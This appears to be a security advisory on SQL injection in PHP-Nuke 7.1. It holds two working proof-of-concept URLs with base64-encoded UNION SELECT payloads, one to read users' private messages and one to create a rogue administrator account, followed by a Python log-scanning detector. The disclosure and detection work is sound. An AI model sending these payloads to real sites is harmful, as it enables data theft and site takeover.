PHP-Nuke Multiple SQL Injection Vulnerabilities
No exploit is required to leverage this issue. The following proof of concept has been provided:

To read arbitrary users' private messages:

http://www.example.com/nuke71/modules.php?name=Private_Messages&file=index&folder=inbox&user=eDpmb28nIFVOSU9OIFNFTEVDVCAyLG51bGwsMSwxLG51bGwvKjox

To create an arbitrary administrator account with username "waraxe2" and password "coolpass":

http://www.example.com/nuke71/admin.php?op=AddAuthor&add_aid=waraxe2&add_name=God&add_pwd=coolpass&add_email=foo@bar.com&add_radminsuper=1&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox
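
For reviewing web server logs, the following added example (not part of the original advisory and not PHP-Nuke code) base64-decodes the `user` and `admin` query parameters used in the requests above and flags decoded values that contain SQL syntax. The marker list is a heuristic assumption, and the benign request is constructed for comparison.

```python
import base64
import binascii
import re
from urllib.parse import urlsplit, parse_qs

# Query parameters that carry base64-encoded values in the requests on this page.
ENCODED_PARAMS = ("user", "admin")

# Heuristic (assumed) markers of SQL syntax that do not belong in an identity token.
SQL_MARKERS = re.compile(r"'|/\*|--|\bunion\b\s+\bselect\b", re.IGNORECASE)

# The two request URLs quoted in the advisory.
PAGE_URLS = [
    "http://www.example.com/nuke71/modules.php?name=Private_Messages&file=index"
    "&folder=inbox&user=eDpmb28nIFVOSU9OIFNFTEVDVCAyLG51bGwsMSwxLG51bGwvKjox",
    "http://www.example.com/nuke71/admin.php?op=AddAuthor&add_aid=waraxe2"
    "&add_name=God&add_pwd=coolpass&add_email=foo@bar.com&add_radminsuper=1"
    "&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox",
]

# Constructed benign request: a token with no SQL syntax in it.
BENIGN_URL = ("http://www.example.com/nuke71/modules.php?name=Private_Messages&user="
              + base64.b64encode(b"2:alice:abcd").decode())


def decode_token(value):
    """Return the base64-decoded text of value, or None if it is not valid base64."""
    value = value.replace(" ", "+")          # parse_qs turns '+' into a space
    padded = value + "=" * (-len(value) % 4)  # tolerate stripped padding
    try:
        return base64.b64decode(padded, validate=True).decode("latin-1")
    except (binascii.Error, ValueError):
        return None


def suspicious_params(url):
    """Return {param: decoded_text} for encoded params whose decoded text has SQL markers."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    hits = {}
    for name in ENCODED_PARAMS:
        for raw in query.get(name, []):
            decoded = decode_token(raw)
            if decoded is not None and SQL_MARKERS.search(decoded):
                hits[name] = decoded
    return hits


if __name__ == "__main__":
    for url in PAGE_URLS + [BENIGN_URL]:
        print(suspicious_params(url) or "clean", "<-", url[:60])
```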